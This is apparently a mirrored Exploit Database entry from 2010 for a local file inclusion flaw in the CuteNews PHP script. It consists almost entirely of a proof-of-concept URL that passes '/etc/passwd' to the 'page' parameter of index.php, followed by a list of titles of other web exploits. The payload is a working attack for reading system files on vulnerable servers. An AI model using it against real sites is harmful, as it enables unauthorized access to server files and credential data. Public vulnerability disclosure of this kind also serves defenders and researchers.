CuteNews – ‘page’ Local File Inclusion

Exploit Database
71 阅读

作者： eidelweiss

日期： 2010-10-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15208/

==========================================================
	CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

	-=[p0c]=-
	
	http://127.0.0.1/index.php?page= [lfi]
			or
	http://127.0.0.1/path/index.php?page=/etc/passwdt

=========================| -=[ E0F ]=- |============================

last Exploits
CuteNews – ‘page’ Local File Inclusion的更多信息

PHPJabbers Vacation Rental Script 3.0 – Multiple Vulnerabilities：
Islam Sound IV2 – ‘details.php’ SQL Injection：
Symantec Messaging Gateway 10.6.1 – Directory Traversal：
Joomla! Component com_crhotels – ‘catid’ SQL Injection：
Responsive FileManager 9.13.4 – ‘path’ Path Traversal：
Macs CMS 1.1.4 – Cross-Site Scripting / Cross-Site Request Forgery：
Notes Manager 1.0 – Arbitrary File Upload：
Chamilo LMS 1.9.10 – Multiple Vulnerabilities：